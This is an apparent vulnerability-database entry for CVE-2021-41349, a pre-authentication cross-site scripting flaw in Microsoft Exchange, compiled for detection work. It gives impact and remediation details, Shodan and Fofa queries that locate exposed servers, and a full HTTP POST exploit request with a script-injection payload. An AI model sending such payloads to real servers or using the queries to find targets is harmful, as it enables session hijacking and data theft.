🔙 목록으로 돌아가기

CVE-2021-41349: Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting

TitleMicrosoft Exchange Server Pre-Auth POST Based Cross-Site Scripting
Authorrootxharsh,iamnoooob
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.
RemediationApply the latest security updates provided by Microsoft to mitigate this vulnerability.
CVSS Score6.5
EPSS Score0.91327
CVE IDCVE-2021-41349
Shodan Queryvuln:cve-2021-26855http.favicon.hash:1768726119http.title:"outlook"cpe:"cpe:2.3:a:microsoft:exchange_server"
Fofa Querytitle="outlook"icon_hash=1768726119
Tags cve cve2021 xss microsoft exchange vkev vuln

🔍 Vulnerability Description

Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.

🌐 HTTP Request

POST /autodiscover/autodiscover.json HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (watchTowr; Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Content-Length: 66
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-41349.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-41349.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A